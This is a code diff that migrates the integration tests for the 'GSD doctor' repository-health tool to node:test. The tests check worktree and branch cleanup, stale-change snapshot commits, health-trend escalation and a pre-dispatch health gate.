     if (process.platform !== "win32") {
-    console.log("\n=== worktree_directory_orphaned (symlinked .gsd not false-positive) ===");
-    {
+    test('worktree_directory_orphaned (symlinked .gsd not false-positive)', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -515,16 +537,14 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const orphanDirIssues = detect.issues.filter(i => i.code === "worktree_directory_orphaned");
-      assertEq(orphanDirIssues.length, 0, "registered worktree via symlinked .gsd NOT flagged as orphaned");
-    }
+      assert.deepStrictEqual(orphanDirIssues.length, 0, "registered worktree via symlinked .gsd NOT flagged as orphaned");
+    });
     } else {
-      console.log("\n=== worktree_directory_orphaned (symlinked .gsd — skipped on Windows) ===");
     }
 
     // ─── Test: worktree_branch_merged detection & fix ──────────────────
     if (process.platform !== "win32") {
-    console.log("\n=== worktree_branch_merged ===");
-    {
+    test('worktree_branch_merged', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -541,23 +561,21 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const mergedIssues = detect.issues.filter(i => i.code === "worktree_branch_merged");
-      assertTrue(mergedIssues.length > 0, "detects merged worktree branch");
-      assertTrue(mergedIssues[0]?.message.includes("safe to remove"), "message says safe to remove");
-      assertTrue(mergedIssues[0]?.fixable === true, "merged worktree is fixable");
+      assert.ok(mergedIssues.length > 0, "detects merged worktree branch");
+      assert.ok(mergedIssues[0]?.message.includes("safe to remove"), "message says safe to remove");
+      assert.ok(mergedIssues[0]?.fixable === true, "merged worktree is fixable");
 
       // Fix should remove the worktree
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("removed merged worktree")), "fix removes merged worktree");
-      assertTrue(!existsSync(wtPath), "worktree directory removed after fix");
-    }
+      assert.ok(fixed.fixesApplied.some(f => f.includes("removed merged worktree")), "fix removes merged worktree");
+      assert.ok(!existsSync(wtPath), "worktree directory removed after fix");
+    });
     } else {
-      console.log("\n=== worktree_branch_merged (skipped on Windows) ===");
     }
 
     // ─── Test: merged milestone/* worktree removes milestone branch ────
     if (process.platform !== "win32") {
-    console.log("\n=== worktree_branch_merged (milestone branch cleanup) ===");
-    {
+    test('worktree_branch_merged (milestone branch cleanup)', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -570,20 +588,18 @@ async function main(): Promise<void> {
       run("git merge milestone/M001 --no-edit", dir);
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("removed merged worktree")), "fix removes merged milestone worktree");
-      assertTrue(!existsSync(wtPath), "milestone worktree directory removed after fix");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("removed merged worktree")), "fix removes merged milestone worktree");
+      assert.ok(!existsSync(wtPath), "milestone worktree directory removed after fix");
 
       const branches = run("git branch --list milestone/M001", dir);
-      assertEq(branches, "", "milestone/M001 branch deleted after merged worktree cleanup");
-    }
+      assert.deepStrictEqual(branches, "", "milestone/M001 branch deleted after merged worktree cleanup");
+    });
     } else {
-      console.log("\n=== worktree_branch_merged (milestone branch cleanup — skipped on Windows) ===");
     }
 
     // ─── Test: worktree_branch_merged NOT flagged for unmerged worktree ─
     if (process.platform !== "win32") {
-    console.log("\n=== worktree_branch_merged (no false positive) ===");
-    {
+    test('worktree_branch_merged (no false positive)', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -597,16 +613,14 @@ async function main(): Promise<void> {
       // Do NOT merge — branch is ahead of main
       const detect = await runGSDDoctor(dir);
       const mergedIssues = detect.issues.filter(i => i.code === "worktree_branch_merged");
-      assertEq(mergedIssues.length, 0, "unmerged worktree NOT flagged as merged");
-    }
+      assert.deepStrictEqual(mergedIssues.length, 0, "unmerged worktree NOT flagged as merged");
+    });
     } else {
-      console.log("\n=== worktree_branch_merged (no false positive — skipped on Windows) ===");
     }
 
     // ─── Test: legacy_slice_branches now fixable ───────────────────────
     if (process.platform !== "win32") {
-    console.log("\n=== legacy_slice_branches (fixable) ===");
-    {
+    test('legacy_slice_branches (fixable)', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -618,27 +632,101 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const legacyIssues = detect.issues.filter(i => i.code === "legacy_slice_branches");
-      assertTrue(legacyIssues.length > 0, "detects legacy slice branches");
-      assertTrue(legacyIssues[0]?.fixable === true, "legacy branches are fixable");
+      assert.ok(legacyIssues.length > 0, "detects legacy slice branches");
+      assert.ok(legacyIssues[0]?.fixable === true, "legacy branches are fixable");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("legacy slice branch")), "fix deletes legacy branches");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("legacy slice branch")), "fix deletes legacy branches");
 
       // Verify branches are gone
       const remaining = run("git branch --list gsd/*/*", dir);
-      assertEq(remaining, "gsd/quick/1-fix-typo", "quick branch preserved; legacy branches removed");
-    }
+      assert.deepStrictEqual(remaining, "gsd/quick/1-fix-typo", "quick branch preserved; legacy branches removed");
+    });
     } else {
-      console.log("\n=== legacy_slice_branches (fixable — skipped on Windows) ===");
     }
 
+    // ─── Test: stale_uncommitted_changes detection & auto-snapshot ──────
+    test('stale_uncommitted_changes (detected and auto-committed)', async () => {
+      const dir = createRepoWithActiveMilestone();
+      cleanups.push(dir);
+
+      // Make the last commit appear old by amending its date to 45 min ago
+      const pastDate = new Date(Date.now() - 45 * 60 * 1000).toISOString();
+      run(`git commit --amend --no-edit --date="${pastDate}"`, dir);
+      // Also set committer date so git log %ct reflects it
+      execSync(`git commit --amend --no-edit`, {
+        cwd: dir,
+        stdio: ["ignore", "pipe", "pipe"],
+        encoding: "utf-8",
+        env: { ...process.env, GIT_COMMITTER_DATE: pastDate },
+      });
+
+      // Modify a tracked file and create a new untracked file. The snapshot
+      // must preserve both, not just tracked changes.
+      writeFileSync(join(dir, "README.md"), "# test\nmodified content\n");
+      writeFileSync(join(dir, "new-untracked.ts"), "export const preserved = true;\n");
+
+      const detect = await runGSDDoctor(dir);
+      const staleIssues = detect.issues.filter(i => i.code === "stale_uncommitted_changes");
+      assert.ok(staleIssues.length > 0, "detects stale uncommitted changes");
+      assert.ok(staleIssues[0]?.message.includes("minute"), "message mentions minutes");
+      assert.ok(staleIssues[0]?.fixable === true, "stale uncommitted changes is fixable");
+
+      // Fix should create a gsd snapshot commit
+      const fixed = await runGSDDoctor(dir, { fix: true });
+      assert.ok(
+        fixed.fixesApplied.some(f => f.includes("gsd snapshot")),
+        "fix creates a gsd snapshot commit",
+      );
+
+      // Verify the snapshot commit was created with the gsd snapshot tag
+      const log = run("git log -1 --oneline", dir);
+      assert.ok(log.includes("gsd snapshot"), "commit is tagged with gsd snapshot");
+
+      const files = run("git show --name-only --format= HEAD", dir);
+      assert.ok(files.includes("README.md"), "snapshot keeps tracked modifications");
+      assert.ok(files.includes("new-untracked.ts"), "snapshot also includes new untracked files");
+      const status = run("git status --short", dir);
+      assert.ok(!status.includes("new-untracked.ts"), "snapshot does not leave the new source file untracked");
+    });
+
+    // ─── Test: stale_uncommitted_changes NOT flagged when recent commit ──
+    test('stale_uncommitted_changes (no false positive on recent commit)', async () => {
+      const dir = createRepoWithActiveMilestone();
+      cleanups.push(dir);
+
+      // Create uncommitted changes (but last commit is fresh — just created)
+      writeFileSync(join(dir, "fresh-dirty.txt"), "recent changes\n");
+
+      const detect = await runGSDDoctor(dir);
+      const staleIssues = detect.issues.filter(i => i.code === "stale_uncommitted_changes");
+      assert.deepStrictEqual(staleIssues.length, 0, "recent commit with dirty tree NOT flagged as stale");
+    });
+
+    // ─── Test: stale_uncommitted_changes NOT flagged when tree is clean ──
+    test('stale_uncommitted_changes (no false positive on clean tree)', async () => {
+      const dir = createRepoWithActiveMilestone();
+      cleanups.push(dir);
+
+      // Make the last commit appear old
+      const pastDate = new Date(Date.now() - 45 * 60 * 1000).toISOString();
+      run(`git commit --amend --no-edit --date="${pastDate}"`, dir);
+      execSync(`git commit --amend --no-edit`, {
+        cwd: dir,
+        stdio: ["ignore", "pipe", "pipe"],
+        encoding: "utf-8",
+        env: { ...process.env, GIT_COMMITTER_DATE: pastDate },
+      });
+
+      // No uncommitted changes — tree is clean
+      const detect = await runGSDDoctor(dir);
+      const staleIssues = detect.issues.filter(i => i.code === "stale_uncommitted_changes");
+      assert.deepStrictEqual(staleIssues.length, 0, "old commit with clean tree NOT flagged as stale");
+    });
+
   } finally {
     for (const dir of cleanups) {
       try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
     }
   }
-
-  report();
-}
-
-main();
+});
diff --git a/src/resources/extensions/gsd/tests/doctor-proactive.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-proactive.test.ts
similarity index 54%
rename from src/resources/extensions/gsd/tests/doctor-proactive.test.ts
rename to src/resources/extensions/gsd/tests/integration/doctor-proactive.test.ts
index efa3c9361..f7a21ca1f 100644
--- a/src/resources/extensions/gsd/tests/doctor-proactive.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/doctor-proactive.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 /**
  * doctor-proactive.test.ts — Tests for proactive healing layer.
  *
@@ -21,11 +23,7 @@ import {
   checkHealEscalation,
   resetProactiveHealing,
   formatHealthSummary,
-} from "../doctor-proactive.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
-
+} from "../../doctor-proactive.ts";
 function run(cmd: string, cwd: string): string {
   return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
 }
@@ -70,44 +68,40 @@ _None_
   return dir;
 }
 
-async function main(): Promise<void> {
+describe('doctor-proactive', async () => {
   const cleanups: string[] = [];
 
   try {
     // ─── Health Score Tracking ─────────────────────────────────────────
-    console.log("\n=== health tracking: initial state ===");
-    {
+    test('health tracking: initial state', () => {
       resetProactiveHealing();
-      assertEq(getHealthTrend(), "unknown", "trend is unknown with no data");
-      assertEq(getConsecutiveErrorUnits(), 0, "no consecutive errors initially");
-      assertEq(getHealthHistory().length, 0, "no history initially");
-    }
+      assert.deepStrictEqual(getHealthTrend(), "unknown", "trend is unknown with no data");
+      assert.deepStrictEqual(getConsecutiveErrorUnits(), 0, "no consecutive errors initially");
+      assert.deepStrictEqual(getHealthHistory().length, 0, "no history initially");
+    });
 
-    console.log("\n=== health tracking: recording snapshots ===");
-    {
+    test('health tracking: recording snapshots', () => {
       resetProactiveHealing();
       recordHealthSnapshot(0, 2, 1);
       recordHealthSnapshot(0, 1, 0);
       recordHealthSnapshot(0, 0, 0);
 
-      assertEq(getHealthHistory().length, 3, "3 snapshots recorded");
-      assertEq(getConsecutiveErrorUnits(), 0, "no consecutive errors after clean units");
-    }
+      assert.deepStrictEqual(getHealthHistory().length, 3, "3 snapshots recorded");
+      assert.deepStrictEqual(getConsecutiveErrorUnits(), 0, "no consecutive errors after clean units");
+    });
 
-    console.log("\n=== health tracking: consecutive error counting ===");
-    {
+    test('health tracking: consecutive error counting', () => {
       resetProactiveHealing();
       recordHealthSnapshot(2, 1, 0); // errors
       recordHealthSnapshot(1, 0, 0); // errors
       recordHealthSnapshot(1, 0, 0); // errors
-      assertEq(getConsecutiveErrorUnits(), 3, "3 consecutive error units");
+      assert.deepStrictEqual(getConsecutiveErrorUnits(), 3, "3 consecutive error units");
 
       recordHealthSnapshot(0, 0, 0); // clean
-      assertEq(getConsecutiveErrorUnits(), 0, "streak reset on clean unit");
-    }
+      assert.deepStrictEqual(getConsecutiveErrorUnits(), 0, "streak reset on clean unit");
+    });
 
-    console.log("\n=== health tracking: trend detection ===");
-    {
+    test('health tracking: trend detection', () => {
       resetProactiveHealing();
       // Record 5 older snapshots with low issues
       for (let i = 0; i < 5; i++) {
@@ -117,11 +111,10 @@ async function main(): Promise<void> {
       for (let i = 0; i < 5; i++) {
         recordHealthSnapshot(3, 5, 0);
       }
-      assertEq(getHealthTrend(), "degrading", "detects degrading trend");
-    }
+      assert.deepStrictEqual(getHealthTrend(), "degrading", "detects degrading trend");
+    });
 
-    console.log("\n=== health tracking: improving trend ===");
-    {
+    test('health tracking: improving trend', () => {
       resetProactiveHealing();
       // Record 5 older snapshots with high issues
       for (let i = 0; i < 5; i++) {
@@ -131,32 +124,29 @@ async function main(): Promise<void> {
       for (let i = 0; i < 5; i++) {
         recordHealthSnapshot(0, 0, 0);
       }
-      assertEq(getHealthTrend(), "improving", "detects improving trend");
-    }
+      assert.deepStrictEqual(getHealthTrend(), "improving", "detects improving trend");
+    });
 
-    console.log("\n=== health tracking: stable trend ===");
-    {
+    test('health tracking: stable trend', () => {
       resetProactiveHealing();
       for (let i = 0; i < 10; i++) {
         recordHealthSnapshot(1, 1, 0);
       }
-      assertEq(getHealthTrend(), "stable", "detects stable trend");
-    }
+      assert.deepStrictEqual(getHealthTrend(), "stable", "detects stable trend");
+    });
 
     // ─── Auto-Heal Escalation ─────────────────────────────────────────
-    console.log("\n=== escalation: below threshold ===");
-    {
+    test('escalation: below threshold', () => {
       resetProactiveHealing();
       recordHealthSnapshot(1, 0, 0);
       recordHealthSnapshot(1, 0, 0);
       recordHealthSnapshot(1, 0, 0);
       const result = checkHealEscalation(1, [{ code: "test", message: "test error", unitId: "M001/S01" }]);
-      assertEq(result.shouldEscalate, false, "no escalation below threshold");
-      assertTrue(result.reason.includes("3/5"), "reason shows progress toward threshold");
-    }
+      assert.deepStrictEqual(result.shouldEscalate, false, "no escalation below threshold");
+      assert.ok(result.reason.includes("3/5"), "reason shows progress toward threshold");
+    });
 
-    console.log("\n=== escalation: at threshold ===");
-    {
+    test('escalation: at threshold', () => {
       resetProactiveHealing();
       // Need 5+ consecutive error units AND degrading/stable trend
       for (let i = 0; i < 5; i++) {
@@ -166,21 +156,19 @@ async function main(): Promise<void> {
         recordHealthSnapshot(2, 1, 0); // recent error snapshots
       }
       const result = checkHealEscalation(2, [{ code: "test", message: "test error", unitId: "M001/S01" }]);
-      assertEq(result.shouldEscalate, true, "escalates at threshold with degrading trend");
-      assertTrue(result.reason.includes("5 consecutive"), "reason mentions consecutive count");
-    }
+      assert.deepStrictEqual(result.shouldEscalate, true, "escalates at threshold with degrading trend");
+      assert.ok(result.reason.includes("5 consecutive"), "reason mentions consecutive count");
+    });
 
-    console.log("\n=== escalation: no double escalation ===");
-    {
+    test('escalation: no double escalation', () => {
       // Don't reset — should already be escalated from previous test
       recordHealthSnapshot(2, 0, 0);
       const result = checkHealEscalation(2, [{ code: "test", message: "test error", unitId: "M001/S01" }]);
-      assertEq(result.shouldEscalate, false, "no double escalation in same session");
-      assertTrue(result.reason.includes("already escalated"), "reason explains why no escalation");
-    }
+      assert.deepStrictEqual(result.shouldEscalate, false, "no double escalation in same session");
+      assert.ok(result.reason.includes("already escalated"), "reason explains why no escalation");
+    });
 
-    console.log("\n=== escalation: deferred when improving ===");
-    {
+    test('escalation: deferred when improving', () => {
       resetProactiveHealing();
       // 5 older snapshots with high errors
       for (let i = 0; i < 5; i++) {
@@ -191,37 +179,34 @@ async function main(): Promise<void> {
         recordHealthSnapshot(1, 0, 0);
       }
       const result = checkHealEscalation(1, [{ code: "test", message: "test error", unitId: "M001/S01" }]);
-      assertEq(result.shouldEscalate, false, "no escalation when trend is improving");
-      assertTrue(result.reason.includes("improving"), "reason mentions improving trend");
-    }
+      assert.deepStrictEqual(result.shouldEscalate, false, "no escalation when trend is improving");
+      assert.ok(result.reason.includes("improving"), "reason mentions improving trend");
+    });
 
     // ─── Health Summary Formatting ────────────────────────────────────
-    console.log("\n=== formatHealthSummary ===");
-    {
+    test('formatHealthSummary', () => {
       resetProactiveHealing();
-      assertEq(formatHealthSummary(), "No health data yet.", "empty summary when no data");
+      assert.deepStrictEqual(formatHealthSummary(), "No health data yet.", "empty summary when no data");
 
       recordHealthSnapshot(2, 3, 1);
       const summary = formatHealthSummary();
-      assertTrue(summary.includes("2 errors") && summary.includes("3 warnings"), "summary includes error/warning counts");
-      assertTrue(summary.includes("1 fix applied"), "summary includes fix count");
-      assertTrue(summary.includes("1 of 5 consecutive errors"), "summary includes error streak");
-    }
+      assert.ok(summary.includes("2 errors") && summary.includes("3 warnings"), "summary includes error/warning counts");
+      assert.ok(summary.includes("1 fix applied"), "summary includes fix count");
+      assert.ok(summary.includes("1 of 5 consecutive errors"), "summary includes error streak");
+    });
 
     // ─── Pre-Dispatch Health Gate ─────────────────────────────────────
-    console.log("\n=== health gate: clean state ===");
-    {
+    test('health gate: clean state', async () => {
       const dir = realpathSync(mkdtempSync(join(tmpdir(), "doc-proactive-")));
       cleanups.push(dir);
       mkdirSync(join(dir, ".gsd"), { recursive: true });
 
       const result = await preDispatchHealthGate(dir);
-      assertTrue(result.proceed, "gate passes on clean state");
-      assertEq(result.issues.length, 0, "no issues on clean state");
-    }
+      assert.ok(result.proceed, "gate passes on clean state");
+      assert.deepStrictEqual(result.issues.length, 0, "no issues on clean state");
+    });
 
-    console.log("\n=== health gate: missing STATE.md does NOT block dispatch (#889) ===");
-    {
+    test('health gate: missing STATE.md does NOT block dispatch (#889)', async () => {
       const dir = realpathSync(mkdtempSync(join(tmpdir(), "doc-proactive-")));
       cleanups.push(dir);
       // Create milestones dir but no STATE.md — mimics fresh worktree
@@ -229,13 +214,45 @@ async function main(): Promise<void> {
       writeFileSync(join(dir, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "# Roadmap\n");
 
       const result = await preDispatchHealthGate(dir);
-      assertTrue(result.proceed, "gate must NOT block when STATE.md is missing (deadlock #889)");
-      assertEq(result.issues.length, 0, "missing STATE.md is not a blocking issue");
-      assertTrue(result.fixesApplied.some((f: string) => f.includes("STATE.md")), "reports STATE.md status as info");
-    }
+      assert.ok(result.proceed, "gate must NOT block when STATE.md is missing (deadlock #889)");
+      assert.deepStrictEqual(result.issues.length, 0, "missing STATE.md is not a blocking issue");
+      assert.ok(result.fixesApplied.some((f: string) => f.includes("STATE.md")), "reports STATE.md status as info");
+    });
 
-    console.log("\n=== health gate: stale crash lock auto-cleared ===");
-    {
+    test('health gate: pre-dispatch snapshot includes new untracked files', async () => {
+      const dir = createRepoWithActiveMilestone();
+      cleanups.push(dir);
+
+      const pastDate = new Date(Date.now() - 45 * 60 * 1000).toISOString();
+      run(`git commit --amend --no-edit --date="${pastDate}"`, dir);
+      execSync(`git commit --amend --no-edit`, {
+        cwd: dir,
+        stdio: ["ignore", "pipe", "pipe"],
+        encoding: "utf-8",
+        env: { ...process.env, GIT_COMMITTER_DATE: pastDate },
+      });
+
+      writeFileSync(join(dir, "README.md"), "# test\nmodified content\n");
+      writeFileSync(join(dir, "new-untracked.ts"), "export const preserved = true;\n");
+
+      const result = await preDispatchHealthGate(dir);
+      assert.ok(result.proceed, "dispatch still proceeds after snapshotting");
+      assert.ok(
+        result.fixesApplied.some((f: string) => f.includes("gsd snapshot")),
+        "pre-dispatch gate creates a snapshot commit",
+      );
+
+      const log = run("git log -1 --oneline", dir);
+      assert.ok(log.includes("gsd snapshot"), "snapshot commit is created");
+
+      const files = run("git show --name-only --format= HEAD", dir);
+      assert.ok(files.includes("README.md"), "snapshot keeps tracked modifications");
+      assert.ok(files.includes("new-untracked.ts"), "snapshot also includes new untracked files");
+      const status = run("git status --short", dir);
+      assert.ok(!status.includes("new-untracked.ts"), "snapshot does not leave the new source file untracked");
+    });
+
+    test('health gate: stale crash lock auto-cleared', async () => {
       const dir = realpathSync(mkdtempSync(join(tmpdir(), "doc-proactive-")));
       cleanups.push(dir);
       mkdirSync(join(dir, ".gsd"), { recursive: true });
@@ -248,12 +265,12 @@ async function main(): Promise<void> {
       }));
 
       const result = await preDispatchHealthGate(dir);
-      assertTrue(result.proceed, "gate passes after auto-clearing stale lock");
-      assertTrue(result.fixesApplied.some(f => f.includes("cleared stale auto.lock")), "reports lock cleared");
-      assertTrue(!existsSync(join(dir, ".gsd", "auto.lock")), "lock file removed");
-    }
+      assert.ok(result.proceed, "gate passes after auto-clearing stale lock");
+      assert.ok(result.fixesApplied.some(f => f.includes("cleared stale auto.lock")), "reports lock cleared");
+      assert.ok(!existsSync(join(dir, ".gsd", "auto.lock")), "lock file removed");
+    });
 
-    console.log("\n=== health gate: corrupt merge state auto-healed ===");
+    test('health gate: corrupt merge state auto-healed', async () => {
     if (process.platform !== "win32") {
     {
       const dir = createGitRepo();
@@ -264,36 +281,35 @@ async function main(): Promise<void> {
       writeFileSync(join(dir, ".git", "MERGE_HEAD"), headHash + "\n");
 
       const result = await preDispatchHealthGate(dir);
-      assertTrue(result.proceed, "gate passes after auto-healing merge state");
-      assertTrue(result.fixesApplied.some(f => f.includes("cleaned merge state")), "reports merge state cleaned");
-      assertTrue(!existsSync(join(dir, ".git", "MERGE_HEAD")), "MERGE_HEAD removed");
+      assert.ok(result.proceed, "gate passes after auto-healing merge state");
+      assert.ok(result.fixesApplied.some(f => f.includes("cleaned merge state")), "reports merge state cleaned");
+      assert.ok(!existsSync(join(dir, ".git", "MERGE_HEAD")), "MERGE_HEAD removed");
     }
     } else {
       console.log("  (skipped on Windows)");
     }
+    });
 
-    console.log("\n=== health gate: STATE.md missing — auto-healed ===");
-    {
+    test('health gate: STATE.md missing — auto-healed', async () => {
       const dir = realpathSync(mkdtempSync(join(tmpdir(), "doc-proactive-")));
       cleanups.push(dir);
       // Minimal .gsd structure: milestones dir exists but no STATE.md
       mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
 
       const stateFile = join(dir, ".gsd", "STATE.md");
-      assertTrue(!existsSync(stateFile), "STATE.md does not exist before gate");
+      assert.ok(!existsSync(stateFile), "STATE.md does not exist before gate");
 
       const result = await preDispatchHealthGate(dir);
-      assertTrue(result.proceed, "gate passes after rebuilding STATE.md");
-      assertTrue(
+      assert.ok(result.proceed, "gate passes after rebuilding STATE.md");
+      assert.ok(
         result.fixesApplied.some(f => f.includes("rebuilt missing STATE.md")),
         "reports STATE.md rebuilt",
       );
-      assertTrue(existsSync(stateFile), "STATE.md created by auto-heal");
-      assertTrue(result.issues.length === 0, "no blocking issues after heal");
-    }
+      assert.ok(existsSync(stateFile), "STATE.md created by auto-heal");
+      assert.ok(result.issues.length === 0, "no blocking issues after heal");
+    });
 
-    console.log("\n=== health gate: stale integration branch uses detected fallback ===");
-    {
+    test('health gate: stale integration branch uses detected fallback', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
@@ -301,21 +317,20 @@ async function main(): Promise<void> {
       writeFileSync(metaPath, JSON.stringify({ integrationBranch: "feature/missing" }, null, 2));
 
       const result = await preDispatchHealthGate(dir);
-      assertTrue(result.proceed, "gate does not block when stale integration branch has detected fallback");
-      assertEq(result.issues.length, 0, "stale integration branch with fallback is not a blocking issue");
-      assertTrue(
+      assert.ok(result.proceed, "gate does not block when stale integration branch has detected fallback");
+      assert.deepStrictEqual(result.issues.length, 0, "stale integration branch with fallback is not a blocking issue");
+      assert.ok(
         result.fixesApplied.some(f => f.includes('feature/missing') && f.includes('main')),
         "fixesApplied reports stale recorded branch and detected fallback branch",
       );
-    }
+    });
 
-    console.log("\n=== health gate: stale integration branch uses configured fallback ===");
-    {
+    test('health gate: stale integration branch uses configured fallback', async () => {
       const dir = createRepoWithActiveMilestone();
       cleanups.push(dir);
 
       run("git branch trunk", dir);
-      writeFileSync(join(dir, ".gsd", "preferences.md"), `---\ngit:\n  main_branch: "trunk"\n---\n`);
+      writeFileSync(join(dir, ".gsd", "PREFERENCES.md"), `---\ngit:\n  main_branch: "trunk"\n---\n`);
       const metaPath = join(dir, ".gsd", "milestones", "M001", "M001-META.json");
       writeFileSync(metaPath, JSON.stringify({ integrationBranch: "feature/missing" }, null, 2));
 
@@ -323,16 +338,16 @@ async function main(): Promise<void> {
       process.chdir(dir);
       try {
         const result = await preDispatchHealthGate(dir);
-        assertTrue(result.proceed, "gate does not block when configured main_branch can be used as fallback");
-        assertEq(result.issues.length, 0, "configured fallback is not treated as a blocking issue");
-        assertTrue(
+        assert.ok(result.proceed, "gate does not block when configured main_branch can be used as fallback");
+        assert.deepStrictEqual(result.issues.length, 0, "configured fallback is not treated as a blocking issue");
+        assert.ok(
           result.fixesApplied.some(f => f.includes('feature/missing') && f.includes('trunk')),
           "fixesApplied reports stale recorded branch and configured fallback branch",
         );
       } finally {
         process.chdir(previousCwd);
       }
-    }
+    });
 
   } finally {
     resetProactiveHealing();
@@ -340,8 +355,4 @@ async function main(): Promise<void> {
       try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
     }
   }
-
-  report();
-}
-
-main();
+});
diff --git a/src/resources/extensions/gsd/tests/integration/doctor-roadmap-summary-atomicity.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-roadmap-summary-atomicity.test.ts
new file mode 100644
index 000000000..40dc6ffd9
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/doctor-roadmap-summary-atomicity.test.ts
@@ -0,0 +1,123 @@
+/**
+ * Regression test for #1910: Doctor marks roadmap checkbox at fixLevel="task"
+ * without summary on disk.
+ *
+ * With reconciliation codes removed (S06), doctor no longer marks roadmap
+ * checkboxes at all. These tests verify the reconciliation is truly gone:
+ * no checkbox toggling, no stub creation.
+ */
+
+import { mkdirSync, writeFileSync, rmSync, readFileSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import test from "node:test";
+import assert from "node:assert/strict";
+import { runGSDDoctor } from "../../doctor.ts";
+
+function makeTmp(name: string): string {
+  const dir = join(tmpdir(), `doctor-roadmap-summary-${name}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+function buildScaffold(base: string) {
+  const gsd = join(base, ".gsd");
+  const m = join(gsd, "milestones", "M001");
+  const s = join(m, "slices", "S01", "tasks");
+  mkdirSync(s, { recursive: true });
+
+  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
+
+## Slices
+
+- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
+  > Demo text
+`);
+
+  writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
+
+**Goal:** test
+
+## Tasks
+
+- [x] **T01: Do stuff** \`est:5m\`
+`);
+
+  writeFileSync(join(s, "T01-SUMMARY.md"), `---
+id: T01
+parent: S01
+milestone: M001
+duration: 5m
+verification_result: passed
+completed_at: 2026-01-01
+---
+
+# T01: Do stuff
+
+Done.
+`);
+}
+
+test("fixLevel:task — roadmap checkbox is never toggled by doctor (reconciliation removed)", async (t) => {
+  const tmp = makeTmp("no-roadmap-toggle");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  buildScaffold(tmp);
+
+  const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
+
+  // Roadmap must remain unchecked — doctor no longer touches checkboxes
+  const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
+  assert.ok(
+    roadmapContent.includes("- [ ] **S01"),
+    "roadmap should remain unchecked — doctor no longer toggles checkboxes"
+  );
+
+  // No summary or UAT stubs created
+  const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
+  assert.ok(!existsSync(sliceSummaryPath), "summary should NOT be created");
+});
+
+test("fixLevel:all — roadmap checkbox is never toggled by doctor (reconciliation removed)", async (t) => {
+  const tmp = makeTmp("all-no-toggle");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  buildScaffold(tmp);
+
+  const report = await runGSDDoctor(tmp, { fix: true });
+
+  // Even at fixLevel:all, doctor no longer creates stubs or toggles checkboxes
+  const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
+  assert.ok(
+    roadmapContent.includes("- [ ] **S01"),
+    "roadmap should remain unchecked — reconciliation removed"
+  );
+
+  const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
+  assert.ok(!existsSync(sliceSummaryPath), "summary should NOT be created");
+});
+
+test("consecutive doctor runs produce no reconciliation codes", async (t) => {
+  const tmp = makeTmp("consecutive-clean");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  buildScaffold(tmp);
+
+  await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
+  const report2 = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
+
+  const REMOVED_CODES = [
+    "task_done_missing_summary",
+    "task_summary_without_done_checkbox",
+    "all_tasks_done_missing_slice_summary",
+    "all_tasks_done_missing_slice_uat",
+    "all_tasks_done_roadmap_not_checked",
+    "slice_checked_missing_summary",
+    "slice_checked_missing_uat",
+  ];
+
+  const codes = report2.issues.map(i => i.code);
+  for (const removed of REMOVED_CODES) {
+    assert.ok(!codes.includes(removed as any), `should NOT report removed code: ${removed}`);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/doctor-runtime.test.ts b/src/resources/extensions/gsd/tests/integration/doctor-runtime.test.ts
similarity index 70%
rename from src/resources/extensions/gsd/tests/doctor-runtime.test.ts
rename to src/resources/extensions/gsd/tests/integration/doctor-runtime.test.ts
index 216ce9084..8d55fd621 100644
--- a/src/resources/extensions/gsd/tests/doctor-runtime.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/doctor-runtime.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 /**
